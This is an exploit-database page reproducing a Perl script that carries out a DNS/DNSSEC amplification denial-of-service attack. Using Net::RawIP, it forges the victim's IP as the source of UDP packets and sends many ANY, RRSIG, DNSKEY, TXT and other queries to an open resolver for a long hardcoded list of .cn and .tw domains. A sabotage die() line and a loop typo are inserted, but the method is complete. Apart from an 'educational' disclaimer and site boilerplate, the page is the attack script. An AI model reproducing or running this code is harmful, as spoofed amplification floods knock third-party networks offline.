Vulners
Lucene search
DNSSEC RR Stub Resolver Denial Of Service Exploit
#!/usr/bin/perl
#
#
# DNS/DNSSEC RR stub resolvers amplification ddos
#
# Copyright 2017 (c) Todor Donev
# [email protected]
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# See also, UDP-based Amplification Attacks:
# https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
use Net::RawIP;
use Net::DNS;
use Data::Validate::IP qw(is_ipv4);
my ($target, $dnsamp) = @ARGV;
my $port = '53';
print "[ DNS/DNSSEC RR stub resolvers amplification ddos\n";
print "[ === \n";
print "[ Copyright 2017 (c) Todor Donev\n";
print "[ todor.donev\@gmail.com\n";
print "[ https://www.ethical-hacker.org/\n";
print "[ https://www.facebook.com/ethicalhackerorg\n";
die("\n\n\n\n\n\t\t\t\t\t\t\tr34d 7h3 c0d3 m0r0n\n\n\n\n\n\n");
die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
die "[ Usage: perl $0 <target> <dns amplificator>\n" unless (scalar @ARGV)==2;
die "[ Error: Invalid IP address\n" if not is_ipv4(@ARGV);
my @domains = qw(
stan.cn
u888.cn
welovechina.cn
38shop.cn
hansa-tmp.cn
incorpnow.cn
freeadschina.cn
mediatech.cn
17ping.cn
chienhong.cn
geektown.cn
x-rage.cn
aonhewittconsulting.cn
iartemis.cn
shinyeh.cn
gedanyao.cn
mufamily.cn
onepod.cn
wenjunnet.cn
xn--365-r48dj4n6n7f.cn
procode.cn
ydy.cn
waylink.cn
onetech.cn
weirandassociates.cn
chengshaobo.cn
cs-pro.cn
floweradvisor.cn
doraxia.cn
greenlon.cn
pcex.cn
projectww.cn
stopwater.cn
chopstickshouse.cn
incorporatenow.cn
magento4u.cn
qnap.cn
liuxiannian.cn
tangjiamei.cn
zlyzwy.cn
dreyfussandco.cn
bentium.cn
bmbbe.cn
hellocq.cn
patenttoday.cn
qiuchangtong.cn
hongkonglaw.cn
jandtwindmills.cn
postojna.cn
centos-repo.cn
dsn888.cn
jiujiaotang.cn
netskys.cn
zhaogedanyang.cn
asiapacificpatent.cn
axelsystems.cn
speedtech.cn
ambassador.cn
eriver.cn
hbhebo.cn
robustness.cn
ccluzhiyi.cn
chtss.cn
maskcase.cn
hpc.tw
4040.idv.tw
xxxxx.tw
tuck.tw
hin.tw
linkin.tw
skies.tw
ohi.tw
ddot.tw
adagio.tw
sino.tw
hp-user.tw
encyclopedia.tw
aptrc.tw
firedragon.tw
treetech.tw
uk-unitour.tw
drama.tw
startist.tw
ics.tw
xman.tw
h2oplus.tw
fundot.tw
c60.tw
chen-yang.tw
1332.tw
ezcall.tw
alexandra.tw
friendship.tw
ctotw.tw
shinmin.tw
haua.tw
ippbx.tw
sto.tw
fairway.tw
idx.tw
topone.tw
sahe.tw
bae.tw
3cnet.tw
felixtw.tw
malossi.tw
zapto.tw
archer.tw
clever.tw
fu-good.tw
lwl.tw
wuzhou.tw
11688.tw
ocean.tw
hsu.tw
mnst.tw
vyatta.tw
yuyi.tw
dailyview.tw
showingwang.tw
faryne.tw
superd.tw
bwyouth.tw
eruru.tw
fengshing.tw
from.tw
ha2.tw
season.tw
wetrust.tw
xinxinya.tw
zuijade.tw
angelwind.tw
mycoco.tw
tapc.tw
carat.com.tw
icart.tw
iseasy.tw
qhi.tw
redfox.tw
sofare.tw
uco.tw
victor.tw
204.tw
chiang.tw
e-top.tw
ordermaster.tw
ewebs.tw
oos.tw
spike.tw
eldora.tw
faitlami.tw
hanpo.tw
junk.tw
knick.tw
omegatech.tw
pona.tw
so-good.tw
ychsu.tw
yifanchen.tw
bogusx.idv.tw
dowgo.tw
etour.com.tw
ieti.com.tw
rollermatic.tw
);
# open(my $fhdom, '<', 'domains.txt') or die "[ Error: $!\n";
# chomp(my @domains = <$fhdom>);
# close $fhdom;
for (my $j=0; $j<[email protected]; $j++) {
my $NSQueryPak = new Net::DNS::Packet($domains[$j], "NS", "IN");
my $nsdata = $NSQueryPak->data;
my $SOAQueryPak = new Net::DNS::Packet($domains[$j], "SOA", "IN");
my $soadata = $SOAQueryPak->data;
my $AQueryPak = new Net::DNS::Packet($domains[$j], "A", "IN");
my $adata = $AQueryPak->data;
my $CNAMEQueryPak = new Net::DNS::Packet($domains[$j], "CNAME", "IN");
my $cnamedata = $CNAMEQueryPak->data;
my $TXTQueryPak = new Net::DNS::Packet($domains[$j], "TXT", "IN");
my $txtdata = $TXTQueryPak->data;
my $ANYQueryPak = new Net::DNS::Packet($domains[$j], "ANY", "IN");
my $anydata = $ANYQueryPak->data;
my $MXQueryPak = new Net::DNS::Packet($domains[$j], "MX", "IN");
my $mxdata = $MXQueryPak->data;
my $RRSIGQueryPak = new Net::DNS::Packet($domains[$j], "RRSIG", "IN");
my $rrsigdata = $RRSIGQueryPak->data;
my $DNSKEYQueryPak = new Net::DNS::Packet($domains[$j], "DNSKEY", "IN");
my $dnskeydata = $DNSKEYQueryPak->data;
my $RPQueryPak = new Net::DNS::Packet($domains[$j], "RP", "IN");
my $rpdata = $RPQueryPak->data;
my $NAPTRQueryPak = new Net::DNS::Packet($domains[$j], "NAPTR", "IN");
my $naptrdata = $NAPTRQueryPak->data;
my $NSEC3QueryPak = new Net::DNS::Packet($domains[$j], "NSEC3", "IN");
my $nsec3data = $NSEC3QueryPak->data;
my $NSECQueryPak = new Net::DNS::Packet($domains[$j], "NSEC", "IN");
my $nsecdata = $NSECQueryPak->data;
my $NSEC3PARAMQueryPak = new Net::DNS::Packet($domains[$j], "NSEC3PARAM", "IN");
my $nsec3paramdata = $NSEC3PARAMQueryPak->data;
my $SRVQueryPak = new Net::DNS::Packet($domains[$j], "SRV", "IN");
my $srvdata = $SRVQueryPak->data;
my $DSQueryPak = new Net::DNS::Packet($domains[$j], "DS", "IN");
my $dsdata = $DSQueryPak->data;
my $sock = new Net::RawIP({ udp => {} }) or die "[ Error: $!\n";
$sock->set({ ip => {
saddr => $target,
daddr => $dnsamp},
udp => {
source => 31337,
dest => $port,
data => $nsdata}}) or die "[ Error: $!\n";
$sock->send;
for (my $rrsigr=0; $rrsigr < 3; $rrsigr++) {
$sock->set({udp => { data=>$rrsigdata }});
$sock->send;
select(undef, undef, undef, 0.20);
}
for (my $dnskeyr=0; $dnskey < 3; $dnskey++) {
$sock->set({udp => { data=>$dnskeydata }});
$sock->send;
}
$sock->set({udp => { data=>$soadata }});
$sock->send;
$sock->set({udp => { data=>$adata }});
$sock->send;
for (my $txtr=0; $txtr < 3; $txtr++) {
$sock->set({udp => { data=>$txtdata }});
$sock->send;
}
$sock->set({udp => { data=>$cnamedata }});
$sock->send;
for (my $anyr=0; $anyr < 3; $anyr++) {
$sock->set({udp => { data=>$anydata }});
$sock->send;
select(undef, undef, undef, 0.20);
}
$sock->set({udp => { data=>$mxdata }});
$sock->send;
$sock->set({udp => { data=>$rpdata }});
$sock->send;
$sock->set({udp => { data=>$dsdata }});
$sock->send;
$sock->set({udp => { data=>$srvdata }});
$sock->send;
$sock->set({udp => { data=>$nsecdata }});
$sock->send;
$sock->set({udp => { data=>$nsec3data }});
$sock->send;
$sock->set({udp => { data=>$nsec3paramdata }});
$sock->send;
$sock->set({udp => { data=>$naptrdata }});
$sock->send;
select(undef, undef, undef, 0.20);
}
# 0day.today [2018-04-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jul 2017 00:00Current
7.4High risk
Vulners AI Score7.4